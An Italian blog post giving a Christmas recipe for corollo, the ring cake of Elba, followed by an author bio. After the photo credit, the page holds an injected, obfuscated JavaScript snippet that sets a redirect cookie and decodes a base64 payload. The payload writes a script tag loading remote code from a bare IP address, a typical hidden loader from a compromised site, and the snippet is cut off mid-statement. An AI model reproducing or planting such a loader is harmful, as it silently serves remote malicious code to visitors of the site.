Image

NATALE IN TAVOLA ALL’ ELBA

Il Natale si avvicina e con lui il tempo di festa e di dolci.

Il corollo all’Elba è il dolce per eccellenza, celebra una festa, un  vero e proprio evento in grado di far gioire tutta la famiglia.

Era ed è un segno per manifestare gioia, solidarietà, buon auspicio.

Ecco per Voi la ricetta direttamente dal rinomato chef Alvaro Claudi:

500 gr di farina, 150 gr di burro, 300 gr di zucchero, 4 uova, un bicchierino di liquore d’anice
un bicchiere di latte, scorza grattugiata di un limone, una bustina di lievito vanigliato, zucchero a velo

Disporre la farina a fontana nel cui cratere verseremo le uova precedentemente sbattute e il burro reso cremoso per mezzo del calore delle mani. Unire lo zucchero, il liquore, la scorza di limone grattugiata e il latte tiepido nel quale avremo stemperato la bustina di lievito. Amalgamare il tutto lavorando l’impasto a lungo. Imburrare e infarinare uno stampo da ciambella e versarvi l’impasto. Cuocere a forno moderato (180°) per circa 40 minuti. Lasciare raffreddare il corollo e prima di servire spolverare con lo zucchero a velo

Buon Appetito!

Foto dal sito: http://panedolcealcioccolato.blogspot.it/ _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento